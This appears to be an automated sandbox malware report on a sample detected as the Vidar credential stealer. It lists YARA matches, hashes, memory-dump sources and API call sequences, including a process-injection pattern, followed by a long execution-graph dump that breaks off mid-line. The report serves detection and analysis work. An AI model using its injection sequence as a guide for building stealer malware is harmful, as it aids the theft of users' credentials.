                                                                                                                                                                                              File size:65'440 bytes
                                                                                                                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:13.2%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                Signature Coverage:33.3%
                                                                                                                                                                                                Total number of Nodes:18
                                                                                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02D698B0
                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D698C3
                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02D698E1
                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02D69905
                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02D69930
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02D69988
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02D699D3
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02D69A11
                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D69A4D
                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02D69A5C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631357172.0000000002D69000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D69000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d69000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                • API String ID: 2687962208-977067982
                                                                                                                                                                                                • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                • Instruction ID: 0f19e0b8d4d94e13b1255ad163cdef8e1bd92cd832caaea2c5ff34e11798389e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                • Instruction Fuzzy Hash: A5B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB341D774FA41CB94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'kq$TJpq$TJpq$Tekq$poq$xbnq
                                                                                                                                                                                                • API String ID: 0-958120308
                                                                                                                                                                                                • Opcode ID: 0a8e940ccb7ad48b4a1177a5e0a10dd7d60996b01f33ec85b6c88c8348a5d8aa
                                                                                                                                                                                                • Instruction ID: 77ce5120a31c10b8a421fa2b37444d4a85757030f38e62e7789cbed4582c51e9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a8e940ccb7ad48b4a1177a5e0a10dd7d60996b01f33ec85b6c88c8348a5d8aa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2552F475A001249FCB15DF68C984A59BBB2FF98304F1585A8E11AAB376CB31EC95CF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 176 2d226b0-2d22712 178 2d22722-2d22761 CreateRemoteThread 176->178 179 2d22714-2d22720 176->179 180 2d22763-2d22769 178->180 181 2d2276a-2d2277e 178->181 179->178 180->181
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,?,?,?,00000000,?,?), ref: 02D22754
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateRemoteThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4286614544-0
                                                                                                                                                                                                • Opcode ID: 54efad0c5961a0a2aa060cbffe7be774a7bdb642a75375b2097e8c04d819555a
                                                                                                                                                                                                • Instruction ID: c43060055edb8c798cd503a5344f149c140cd8ec79d22274712180a6c947c583
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54efad0c5961a0a2aa060cbffe7be774a7bdb642a75375b2097e8c04d819555a
                                                                                                                                                                                                • Instruction Fuzzy Hash: E23110B5900249EFCB10CFA9D984ADEBFF0FB48314F20842AE958A7310D375A954CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 183 2d226b8-2d22712 185 2d22722-2d22761 CreateRemoteThread 183->185 186 2d22714-2d22720 183->186 187 2d22763-2d22769 185->187 188 2d2276a-2d2277e 185->188 186->185 187->188
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,?,?,?,00000000,?,?), ref: 02D22754
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateRemoteThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4286614544-0
                                                                                                                                                                                                • Opcode ID: 78bc15835a9e4915fa38201cecc184a765d9c2e7c9e9141f5a1d6848cb0b2f78
                                                                                                                                                                                                • Instruction ID: 158e8cbf8c4dcd9639cb0177da501975ef96b6e5f5090be66532cb010eb0174a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 78bc15835a9e4915fa38201cecc184a765d9c2e7c9e9141f5a1d6848cb0b2f78
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F2103B5900249DFCB10CF9AD984ADEBBF4FF48314F20842AE958A7350D375A954CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D22669
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: b196d64d0739d5fa48107ad4aa1cab78e763ae4878abfe057b0f1c80175640e7
                                                                                                                                                                                                • Instruction ID: d2f1da75615390fe64433d463b44fb5d42ad344c69f6c4c037426a39e04e464e
                                                                                                                                                                                                • Opcode Fuzzy Hash: b196d64d0739d5fa48107ad4aa1cab78e763ae4878abfe057b0f1c80175640e7
                                                                                                                                                                                                • Instruction Fuzzy Hash: C62104B190125AEFDB00CF99D984BDEFBB4BB08314F10816AE958A7241D378A944CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D22669
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: b7c989a8b667d8e1e4fefc09719f564dbd828648cc85e390195943a4d439896c
                                                                                                                                                                                                • Instruction ID: 5dcb231683c48d7474d5fa414dbb8cf4318ae02e0d4689f33d660cd779555955
                                                                                                                                                                                                • Opcode Fuzzy Hash: b7c989a8b667d8e1e4fefc09719f564dbd828648cc85e390195943a4d439896c
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE21E5B1901259AFCB00CF9AD984ADEFBB4FB08314F10812AE958A7350D374A954CFA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: TJpq$TJpq$Tekq$xbnq
                                                                                                                                                                                                • API String ID: 0-3315297412
                                                                                                                                                                                                • Opcode ID: d099f7227d82bdf33fa40e571bba7525a78ebdcfb39d8ee8057af518605e2d96
                                                                                                                                                                                                • Instruction ID: bc9a7428019541eaacbde5e6c58ff31323e3f893f5fe0169b0d61cfda07c105c
                                                                                                                                                                                                • Opcode Fuzzy Hash: d099f7227d82bdf33fa40e571bba7525a78ebdcfb39d8ee8057af518605e2d96
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4C13971A002299FDB14DF69C994B9DBBF2FF98305F1481A8E019EB365DB31AC49CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'kq$4'kq
                                                                                                                                                                                                • API String ID: 0-4171853269
                                                                                                                                                                                                • Opcode ID: 64fb1f56cd59648f7baf6968e51988f4fda5420ecdba15b1ec73761700406a2f
                                                                                                                                                                                                • Instruction ID: 754994947108be2cb17dcdb0fe608a6f819f55cd46d8bca0d189851bc4d6d36e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 64fb1f56cd59648f7baf6968e51988f4fda5420ecdba15b1ec73761700406a2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 47614C75E412458FDB09EF6AE56069ABBF3AFC8300B14C579D0159B378EF70990A8F60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'kq$4'kq
                                                                                                                                                                                                • API String ID: 0-4171853269
                                                                                                                                                                                                • Opcode ID: 3a63fd086f2881b6ea8bb9cf6821adc699acf89398165271d75e244e43f76ce2
                                                                                                                                                                                                • Instruction ID: 32fc3b1471630185d9bdf89c619ac9dcd25f326f2d94f5829f5511d8c13e50f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a63fd086f2881b6ea8bb9cf6821adc699acf89398165271d75e244e43f76ce2
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5511B75E412458FDB09EF6AE56069ABBF3AFC8300B14C529D0159B378EF70990A8B60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:4.4%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.7%
                                                                                                                                                                                                Signature Coverage:5%
                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                Total number of Limit Nodes:32
API calls 79987->79988 79989 402d16 79988->79989 79990 4024f9 9 API calls 79989->79990 79991 402d27 79990->79991 79992 4024f9 9 API calls 79991->79992 79993 402d38 79992->79993 79994 4024f9 9 API calls 79993->79994 79995 402d49 79994->79995 79996 4024f9 9 API calls 79995->79996 79997 402d5a 79996->79997 79998 4024f9 9 API calls 79997->79998 79999 402d6b 79998->79999 80000 4024f9 9 API calls 79999->80000 80001 402d7c 80000->80001 80002 4024f9 9 API calls 80001->80002 80003 402d8d 80002->80003 80004 4024f9 9 API calls 80003->80004 80005 402d9e 80004->80005 80006 4024f9 9 API calls 80005->80006 80007 402daf 80006->80007 80008 4024f9 9 API calls 80007->80008 80009 402dc0 80008->80009 80010 4024f9 9 API calls 80009->80010 80011 402dd1 80010->80011 80012 4024f9 9 API calls 80011->80012 80013 402de2 80012->80013 80014 4024f9 9 API calls 80013->80014 80015 402df3 80014->80015 80016 4024f9 9 API calls 80015->80016 80017 402e04 80016->80017 80018 4024f9 9 API calls 80017->80018 80019 402e15 80018->80019 80020 4024f9 9 API calls 80019->80020 80021 402e26 80020->80021 80022 4024f9 9 API calls 80021->80022 80023 402e37 80022->80023 80024 4024f9 9 API calls 80023->80024 80025 402e48 80024->80025 80026 4024f9 9 API calls 80025->80026 80027 402e59 80026->80027 80028 4024f9 9 API calls 80027->80028 80029 402e6a 80028->80029 80030 4024f9 9 API calls 80029->80030 80031 402e7b 80030->80031 80032 4024f9 9 API calls 80031->80032 80033 402e8c 80032->80033 80034 4024f9 9 API calls 80033->80034 80035 402e9d 80034->80035 80036 4024f9 9 API calls 80035->80036 80037 402eae 80036->80037 80038 4024f9 9 API calls 80037->80038 80039 402ebf 80038->80039 80040 4024f9 9 API calls 80039->80040 80041 402ed0 80040->80041 80042 4024f9 9 API calls 80041->80042 80043 402ee1 80042->80043 80044 4024f9 9 API calls 80043->80044 80045 402ef2 80044->80045 80046 4024f9 9 API calls 80045->80046 80047 402f03 80046->80047 80048 4024f9 9 API calls 80047->80048 80049 402f14 80048->80049 80050 4024f9 9 API calls 
80049->80050 80051 402f25 80050->80051 80052 4024f9 9 API calls 80051->80052 80053 402f36 80052->80053 80054 4024f9 9 API calls 80053->80054 80055 402f47 80054->80055 80056 4024f9 9 API calls 80055->80056 80057 402f58 80056->80057 80058 4024f9 9 API calls 80057->80058 80059 402f69 80058->80059 80060 4024f9 9 API calls 80059->80060 80061 402f7a 80060->80061 80062 4024f9 9 API calls 80061->80062 80063 402f8b 80062->80063 80064 4024f9 9 API calls 80063->80064 80065 402f9c 80064->80065 80066 4024f9 9 API calls 80065->80066 80067 402fad 80066->80067 80068 4024f9 9 API calls 80067->80068 80069 402fbe 80068->80069 80070 4024f9 9 API calls 80069->80070 80071 402fcf 80070->80071 80072 4024f9 9 API calls 80071->80072 80073 402fe0 80072->80073 80074 4024f9 9 API calls 80073->80074 80075 402ff1 80074->80075 80076 4024f9 9 API calls 80075->80076 80077 403002 80076->80077 80078 4024f9 9 API calls 80077->80078 80079 403013 80078->80079 80080 4024f9 9 API calls 80079->80080 80081 403024 80080->80081 80082 4024f9 9 API calls 80081->80082 80083 403035 80082->80083 80084 4024f9 9 API calls 80083->80084 80085 403046 80084->80085 80086 4024f9 9 API calls 80085->80086 80087 403057 80086->80087 80088 4024f9 9 API calls 80087->80088 80089 403068 80088->80089 80090 4024f9 9 API calls 80089->80090 80091 403079 80090->80091 80092 4024f9 9 API calls 80091->80092 80093 40308a 80092->80093 80094 4024f9 9 API calls 80093->80094 80095 40309b 80094->80095 80096 4024f9 9 API calls 80095->80096 80097 4030ac 80096->80097 80098 4024f9 9 API calls 80097->80098 80099 4030bd 80098->80099 80100 4024f9 9 API calls 80099->80100 80101 4030ce 80100->80101 80102 4024f9 9 API calls 80101->80102 80103 4030df 80102->80103 80104 4024f9 9 API calls 80103->80104 80105 4030f0 80104->80105 80106 4024f9 9 API calls 80105->80106 80107 403101 80106->80107 80108 4024f9 9 API calls 80107->80108 80109 403112 80108->80109 80110 4024f9 9 API calls 80109->80110 80111 403123 80110->80111 80112 4024f9 9 API calls 80111->80112 
80113 403134 80112->80113 80114 4024f9 9 API calls 80113->80114 80115 403145 80114->80115 80116 4024f9 9 API calls 80115->80116 80117 403156 80116->80117 80118 4024f9 9 API calls 80117->80118 80119 403167 80118->80119 80120 4024f9 9 API calls 80119->80120 80121 403178 80120->80121 80122 4024f9 9 API calls 80121->80122 80123 403189 80122->80123 80124 4024f9 9 API calls 80123->80124 80125 40319a 80124->80125 80126 4024f9 9 API calls 80125->80126 80127 4031ab 80126->80127 80128 4024f9 9 API calls 80127->80128 80129 4031bc 80128->80129 80130 4024f9 9 API calls 80129->80130 80131 4031cd 80130->80131 80132 4024f9 9 API calls 80131->80132 80133 4031de 80132->80133 80134 4024f9 9 API calls 80133->80134 80135 4031ef 80134->80135 80136 4024f9 9 API calls 80135->80136 80137 403200 80136->80137 80138 4024f9 9 API calls 80137->80138 80139 403211 80138->80139 80140 4024f9 9 API calls 80139->80140 80141 403222 80140->80141 80142 4024f9 9 API calls 80141->80142 80143 403233 80142->80143 80144 4024f9 9 API calls 80143->80144 80145 403244 80144->80145 80146 4024f9 9 API calls 80145->80146 80147 403255 80146->80147 80148 4024f9 9 API calls 80147->80148 80149 403266 80148->80149 80150 4024f9 9 API calls 80149->80150 80151 403277 80150->80151 80152 4024f9 9 API calls 80151->80152 80153 403288 80152->80153 80154 4024f9 9 API calls 80153->80154 80155 403299 80154->80155 80156 4024f9 9 API calls 80155->80156 80157 4032aa 80156->80157 80158 4024f9 9 API calls 80157->80158 80159 4032bb 80158->80159 80160 4024f9 9 API calls 80159->80160 80161 4032cc 80160->80161 80162 4024f9 9 API calls 80161->80162 80163 4032dd 80162->80163 80164 4024f9 9 API calls 80163->80164 80165 4032ee 80164->80165 80166 4024f9 9 API calls 80165->80166 80167 4032ff 80166->80167 80168 4024f9 9 API calls 80167->80168 80169 403310 80168->80169 80170 4024f9 9 API calls 80169->80170 80171 403321 80170->80171 80172 4024f9 9 API calls 80171->80172 80173 403332 80172->80173 80174 4024f9 9 API calls 80173->80174 80175 403343 
80174->80175 80176 4024f9 9 API calls 80175->80176 80177 403354 80176->80177 80178 4024f9 9 API calls 80177->80178 80179 403365 80178->80179 80180 4024f9 9 API calls 80179->80180 80181 403376 80180->80181 80182 4024f9 9 API calls 80181->80182 80183 403387 80182->80183 80184 4024f9 9 API calls 80183->80184 80185 403398 80184->80185 80186 4024f9 9 API calls 80185->80186 80187 4033a9 80186->80187 80188 4024f9 9 API calls 80187->80188 80189 4033ba 80188->80189 80190 4024f9 9 API calls 80189->80190 80191 4033cb 80190->80191 80192 4024f9 9 API calls 80191->80192 80193 4033dc 80192->80193 80194 4024f9 9 API calls 80193->80194 80195 4033ed 80194->80195 80196 4024f9 9 API calls 80195->80196 80197 4033fe 80196->80197 80198 4024f9 9 API calls 80197->80198 80199 40340f 80198->80199 80200 4024f9 9 API calls 80199->80200 80201 403420 80200->80201 80202 4024f9 9 API calls 80201->80202 80203 403431 80202->80203 80204 4024f9 9 API calls 80203->80204 80205 403442 80204->80205 80206 4024f9 9 API calls 80205->80206 80207 403453 80206->80207 80208 4024f9 9 API calls 80207->80208 80209 403464 80208->80209 80210 4024f9 9 API calls 80209->80210 80211 403475 80210->80211 80212 4024f9 9 API calls 80211->80212 80213 403486 80212->80213 80214 4024f9 9 API calls 80213->80214 80215 403497 80214->80215 80216 4024f9 9 API calls 80215->80216 80217 4034a8 80216->80217 80218 4024f9 9 API calls 80217->80218 80219 4034b9 80218->80219 80220 4024f9 9 API calls 80219->80220 80221 4034ca 80220->80221 80222 4024f9 9 API calls 80221->80222 80223 4034db 80222->80223 80224 4024f9 9 API calls 80223->80224 80225 4034ec 80224->80225 80226 4024f9 9 API calls 80225->80226 80227 4034fd 80226->80227 80228 4024f9 9 API calls 80227->80228 80229 40350e 80228->80229 80230 4024f9 9 API calls 80229->80230 80231 40351f 80230->80231 80232 4024f9 9 API calls 80231->80232 80233 403530 80232->80233 80234 4024f9 9 API calls 80233->80234 80235 403541 80234->80235 80236 4024f9 9 API calls 80235->80236 80237 403552 80236->80237 
80238 4024f9 9 API calls 80237->80238 80239 403563 80238->80239 80240 4024f9 9 API calls 80239->80240 80241 403574 80240->80241 80242 4024f9 9 API calls 80241->80242 80243 403585 80242->80243 80244 4024f9 9 API calls 80243->80244 80245 403596 80244->80245 80246 4024f9 9 API calls 80245->80246 80247 4035a7 80246->80247 80248 4024f9 9 API calls 80247->80248 80249 4035b8 80248->80249 80250 4024f9 9 API calls 80249->80250 80251 4035c9 80250->80251 80252 4024f9 9 API calls 80251->80252 80253 4035da 80252->80253 80254 4024f9 9 API calls 80253->80254 80255 4035eb 80254->80255 80256 4024f9 9 API calls 80255->80256 80257 4035fc 80256->80257 80258 4024f9 9 API calls 80257->80258 80259 40360d 80258->80259 80260 4024f9 9 API calls 80259->80260 80261 40361e 80260->80261 80262 4024f9 9 API calls 80261->80262 80263 40362f 80262->80263 80264 4024f9 9 API calls 80263->80264 80265 403640 80264->80265 80266 4024f9 9 API calls 80265->80266 80267 403651 80266->80267 80268 4024f9 9 API calls 80267->80268 80269 403662 80268->80269 80270 4024f9 9 API calls 80269->80270 80271 403673 80270->80271 80272 4024f9 9 API calls 80271->80272 80273 403684 80272->80273 80274 4024f9 9 API calls 80273->80274 80275 403695 80274->80275 80276 4024f9 9 API calls 80275->80276 80277 4036a6 80276->80277 80278 4024f9 9 API calls 80277->80278 80279 4036b7 80278->80279 80280 4024f9 9 API calls 80279->80280 80281 4036c8 80280->80281 80282 4024f9 9 API calls 80281->80282 80283 4036d9 80282->80283 80284 4024f9 9 API calls 80283->80284 80285 4036ea 80284->80285 80286 4024f9 9 API calls 80285->80286 80287 4036fb 80286->80287 80288 4024f9 9 API calls 80287->80288 80289 40370c 80288->80289 80290 4024f9 9 API calls 80289->80290 80291 40371d 80290->80291 80292 4024f9 9 API calls 80291->80292 80293 40372e 80292->80293 80294 4024f9 9 API calls 80293->80294 80295 40373f 80294->80295 80296 4024f9 9 API calls 80295->80296 80297 403750 80296->80297 80298 4024f9 9 API calls 80297->80298 80299 403761 80298->80299 80300 4024f9 9 
API calls 80299->80300 80301 403772 80300->80301 80302 4024f9 9 API calls 80301->80302 80303 403783 80302->80303 80304 4024f9 9 API calls 80303->80304 80305 403794 80304->80305 80306 4024f9 9 API calls 80305->80306 80307 4037a5 80306->80307 80308 4024f9 9 API calls 80307->80308 80309 4037b6 80308->80309 80310 4024f9 9 API calls 80309->80310 80311 4037c7 80310->80311 80312 4024f9 9 API calls 80311->80312 80313 4037d8 80312->80313 80314 4024f9 9 API calls 80313->80314 80315 4037e9 80314->80315 80316 4024f9 9 API calls 80315->80316 80317 4037fa 80316->80317 80318 4024f9 9 API calls 80317->80318 80319 40380b 80318->80319 80320 4024f9 9 API calls 80319->80320 80321 40381c 80320->80321 80322 4024f9 9 API calls 80321->80322 80323 40382d 80322->80323 80324 4024f9 9 API calls 80323->80324 80325 40383e 80324->80325 80326 4024f9 9 API calls 80325->80326 80327 40384f 80326->80327 80328 4024f9 9 API calls 80327->80328 80329 403860 80328->80329 80330 4024f9 9 API calls 80329->80330 80331 403871 80330->80331 80332 4024f9 9 API calls 80331->80332 80333 403882 80332->80333 80334 4024f9 9 API calls 80333->80334 80335 403893 80334->80335 80336 4024f9 9 API calls 80335->80336 80337 4038a4 80336->80337 80338 4024f9 9 API calls 80337->80338 80339 4038b5 80338->80339 80340 4024f9 9 API calls 80339->80340 80341 4038c6 80340->80341 80342 4024f9 9 API calls 80341->80342 80343 4038d7 80342->80343 80344 4024f9 9 API calls 80343->80344 80345 4038e8 80344->80345 80346 4024f9 9 API calls 80345->80346 80347 4038f9 80346->80347 80348 4024f9 9 API calls 80347->80348 80349 40390a 80348->80349 80350 4024f9 9 API calls 80349->80350 80351 40391b 80350->80351 80352 4024f9 9 API calls 80351->80352 80353 40392c 80352->80353 80354 4024f9 9 API calls 80353->80354 80355 40393d 80354->80355 80356 4024f9 9 API calls 80355->80356 80357 40394e 80356->80357 80358 4024f9 9 API calls 80357->80358 80359 40395f 80358->80359 80360 4024f9 9 API calls 80359->80360 80361 403970 80360->80361 80362 4024f9 9 API calls 
80361->80362 80363 403981 80362->80363 80364 4024f9 9 API calls 80363->80364 80365 403992 80364->80365 80366 4024f9 9 API calls 80365->80366 80367 4039a3 80366->80367 80368 4024f9 9 API calls 80367->80368 80369 4039b4 80368->80369 80370 4024f9 9 API calls 80369->80370 80371 4039c5 80370->80371 80372 4024f9 9 API calls 80371->80372 80373 4039d6 80372->80373 80374 4024f9 9 API calls 80373->80374 80375 4039e7 80374->80375 80376 4024f9 9 API calls 80375->80376 80377 4039f8 80376->80377 80378 4024f9 9 API calls 80377->80378 80379 403a09 80378->80379 80380 4024f9 9 API calls 80379->80380 80381 403a1a 80380->80381 80382 4024f9 9 API calls 80381->80382 80383 403a2b 80382->80383 80384 4024f9 9 API calls 80383->80384 80385 403a3c 80384->80385 80386 4024f9 9 API calls 80385->80386 80387 403a4d 80386->80387 80388 4024f9 9 API calls 80387->80388 80389 403a5e 80388->80389 80390 4024f9 9 API calls 80389->80390 80391 403a6f 80390->80391 80392 416676 80391->80392 80393 416683 43 API calls 80392->80393 80394 416a5b 9 API calls 80392->80394 80393->80394 80395 416b6a 80394->80395 80396 416afc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80394->80396 80397 416b77 8 API calls 80395->80397 80398 416c2a 80395->80398 80396->80395 80397->80398 80399 416ca1 80398->80399 80400 416c33 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80398->80400 80401 416d33 80399->80401 80402 416cae 6 API calls 80399->80402 80400->80399 80403 416d40 9 API calls 80401->80403 80404 416e0a 80401->80404 80402->80401 80403->80404 80405 416e81 80404->80405 80406 416e13 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80404->80406 80407 416eb3 80405->80407 80408 416e8a GetProcAddress GetProcAddress 80405->80408 80406->80405 80409 416ee5 80407->80409 80410 416ebc GetProcAddress GetProcAddress 80407->80410 80408->80407 80411 416fd1 80409->80411 80412 416ef2 10 API calls 80409->80412 80410->80409 80413 417031 80411->80413 80414 416fda 
